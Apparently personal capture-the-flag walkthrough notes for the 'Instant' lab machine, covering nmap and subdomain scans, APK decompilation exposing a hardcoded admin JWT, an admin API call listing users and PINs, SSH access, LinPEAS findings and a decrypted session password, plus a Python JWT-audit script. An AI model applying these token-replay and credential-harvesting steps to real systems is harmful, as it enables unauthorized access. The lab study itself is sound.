1. NMAP

sudo nmap -sC -sV --vv -p- 10.129.231.155 -T5

PORT      STATE    SERVICE REASON         VERSION
22/tcp    open     ssh     syn-ack ttl 63 OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 31:83:eb:9f:15:f8:40:a5:04:9c:cb:3f:f6:ec:49:76 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBMM6fK04LJ4jNNL950Ft7YHPO9NKONYVCbau/+tQKoy3u7J9d8xw2sJaajQGLqTvyWMolbN3fKzp7t/s/ZMiZNo=
|   256 6f:66:03:47:0e:8a:e0:03:97:67:5b:41:cf:e2:c7:c7 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIL+zjgyGvnf4lMAlvdgVHlwHd+/U4NcThn1bx5/4DZYY
80/tcp    open     http    syn-ack ttl 63 Apache httpd 2.4.58
|_http-title: Did not follow redirect to http://instant.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.58 (Ubuntu)
22193/tcp filtered unknown no-response
51482/tcp filtered unknown no-response
Service Info: Host: instant.htb; OS: Linux; CPE: cpe:/o:linux:linux_kernel

2. Port 80

Subdomains

ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://instant.htb/ -H 'Host: FUZZ.instant.htb' -fc 301


Services

└─$ whatweb http://instant.htb                                                              
http://instant.htb [200 OK] Apache[2.4.58], Bootstrap[4.0.0], Country[RESERVED][ZZ], Email[support@instant.htb], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.58 (Ubuntu)], IP[10.129.231.155], JQuery[3.2.1], Script, Title[Instant Wallet]

The link on the page provides an APK.

3. Port 22193

4. Port 51482

5. Jadx

jadx-gui

Open instant.apk

Found subdomain: http://mywalletv1.instant.htb/api/v1/view/profile

Found Header "Authorization", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA"

JWT content:

Adding the subdomain to /etc/hosts gives the profile of the admin.
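The hardcoded Authorization token above, decoded and audited the way a reviewer of the decompiled APK would. This is an added example, not part of the original notes: the function names and the 30-day lifetime threshold are assumptions, and the sample source line is constructed around the token shown above.

```python
import base64, json, re, time

# Constructed sample: one decompiled-source line embedding the token from the notes above.
SAMPLE_SOURCE = '.addHeader("Authorization", "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA")'

# Three base64url segments; header and payload both start with eyJ ('{"').
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")
MAX_LIFETIME_DAYS = 30  # assumed policy threshold, not from the notes


def b64url_json(segment):
    """Decode one base64url JWT segment (padding restored) into a dict."""
    padded = segment + "=" * (-len(segment) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def decode_jwt(token):
    """Return (header, claims) without verifying the signature."""
    header_b64, payload_b64, _signature = token.split(".")
    return b64url_json(header_b64), b64url_json(payload_b64)


def audit_source(text, now=None):
    """Find JWTs embedded in source text and list what makes each one risky."""
    now = time.time() if now is None else now
    findings = []
    for token in JWT_RE.findall(text):
        header, claims = decode_jwt(token)
        issues = ["token hardcoded in client code"]
        if str(header.get("alg", "")).startswith("HS"):
            issues.append("symmetric alg %s: one shared secret signs every token" % header["alg"])
        exp = claims.get("exp")
        if exp is None:
            issues.append("no exp claim")
        elif exp - now > MAX_LIFETIME_DAYS * 86400:
            issues.append("expires in ~%d years" % ((exp - now) // (365 * 86400)))
        if str(claims.get("role", "")).lower() == "admin":
            issues.append("privileged role claim: %s" % claims["role"])
        findings.append({"header": header, "claims": claims, "issues": issues})
    return findings


if __name__ == "__main__":
    for finding in audit_source(SAMPLE_SOURCE):
        print(json.dumps(finding, indent=2))
```

The decoded `walId` is the same value as the `wallet_id` of `instantAdmin` in the user list returned by the API.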

Login part

JsonObject jsonObject = new JsonObject();
jsonObject.addProperty("username", str);
jsonObject.addProperty("password", str2);
new OkHttpClient().newCall(new Request.Builder().url("http://mywalletv1.instant.htb/api/v1/login")
        .post(RequestBody.create(MediaType.parse("application/json"), jsonObject.toString())).build()).enqueue(new Callback()

Register form:

public void register(String str, String str2, String str3, String str4) {
        JsonObject jsonObject = new JsonObject();
        jsonObject.addProperty("username", str);
        jsonObject.addProperty(NotificationCompat.CATEGORY_EMAIL, str2);
        jsonObject.addProperty("password", str3);
        jsonObject.addProperty("pin", str4);
        new OkHttpClient().newCall(new Request.Builder().url("http://mywalletv1.instant.htb/api/v1/register")
        .post(RequestBody.create(MediaType.parse("application/json"),

Transaction form:

    public void sendFunds(String str, String str2, String str3, String str4, String str5) {
        JsonObject jsonObject = new JsonObject();
        jsonObject.addProperty("receiver", str);
        jsonObject.addProperty("amount", str2);
        jsonObject.addProperty("note", str3);
        new OkHttpClient().newCall(new Request.Builder().url("http://mywalletv1.instant.htb/api/v1/initiate/transaction").addHeader("Authorization", str4).post(RequestBody.create(MediaType.parse("application/json"),
    }

JsonObject jsonObject = new JsonObject();
jsonObject.addProperty("pin", this.val$pin);
url("http://mywalletv1.instant.htb/api/v1/confirm/pin")
.header("Authorization", this.val$access_token)
.post(RequestBody.create(MediaType.parse("application/json")

On res/xml

6. SSH

Log in as shirohige: save the RSA key locally and chmod it.

LinPEAS on target:

╔══════════╣ Analyzing Env Files (limit 70)
-rw-r--r-- 1 shirohige shirohige 71 Aug  8 19:34 /home/shirohige/projects/mywallet/Instant-Api/mywallet/.env   
SECRET_KEY=VeryStrongS3cretKeyY0uC4NTGET

/home/shirohige/.mysql_history

In /opt there is a Solar-PuTTY sessions file, sessions-backup.dat.

The Void decryptor, available online, can decrypt this type of file.

12**24nzC!r0c%q12

7. Swagger subdomain

└─$ curl -X GET "http://swagger-ui.instant.htb/api/v1/admin/list/users" -H  "accept: application/json" -H 'Authorization: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6MSwicm9sZSI6IkFkbWluIiwid2FsSWQiOiJmMGVjYTZlNS03ODNhLTQ3MWQtOWQ4Zi0wMTYyY2JjOTAwZGIiLCJleHAiOjMzMjU5MzAzNjU2fQ.v0qyyAqDSgyoNFHU7MgRQcDA0Bw99_8AEXKGtWZ6rYA'

{"Status":200,"Users":[
{"email":"admin@instant.htb",
"role":"Admin",
"secret_pin":87348,
"status":"active",
"username":"instantAdmin",
"wallet_id":"f0eca6e5-783a-471d-9d8f-0162cbc900db"
},
{"email":"shirohige@instant.htb",
"role":"instantian",
"secret_pin":42845,
"status":"active",
"username":"shirohige",
"wallet_id":"458715c9-b15e-467b-8a3d-97bc3fcf3c11"}]}


Maybe with the JWT that was found.

© 2025 Daniel Andrade 👨🏻‍💻